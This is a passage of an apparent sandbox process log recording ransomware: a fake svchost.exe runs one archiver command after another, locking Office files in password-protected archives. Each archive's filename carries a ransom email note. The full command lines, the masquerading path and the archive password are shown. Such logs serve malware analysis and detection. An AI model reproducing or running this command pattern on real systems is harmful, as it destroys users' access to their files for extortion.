  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.wordmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.wordmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Licenses\c2rpridslicensefiles_auto.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Licenses\c2rpridslicensefiles_auto.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Licenses16\c2rpridslicensefiles_auto.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Licenses16\c2rpridslicensefiles_auto.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\loc\AppXManifestLoc.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\loc\AppXManifestLoc.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5756
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientPreview_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientPreview_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_M365_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_M365_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\CT_ROOTS.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\CT_ROOTS.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4260
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6068
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentfallback.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentfallback.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentlogon.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentlogon.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3420
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PPT_WHATSNEW.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PPT_WHATSNEW.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHKEY.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHKEY.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLTS.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLTS.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHPHN.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHPHN.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHSRN.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHSRN.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessVDI2019_eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessVDI2019_eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPack2019Eula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPack2019Eula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\WordNaiveBayesCommandRanker.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\WordNaiveBayesCommandRanker.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6140
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\BI-Report.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\BI-Report.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en\LocalizedStrings.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en\LocalizedStrings.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_security_terms_dict.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_security_terms_dict.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_terms_dict.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\Configuration\card_terms_dict.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4392
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_company.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_company.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1628
- C:\ProgramData\msvkp\svchost.exe
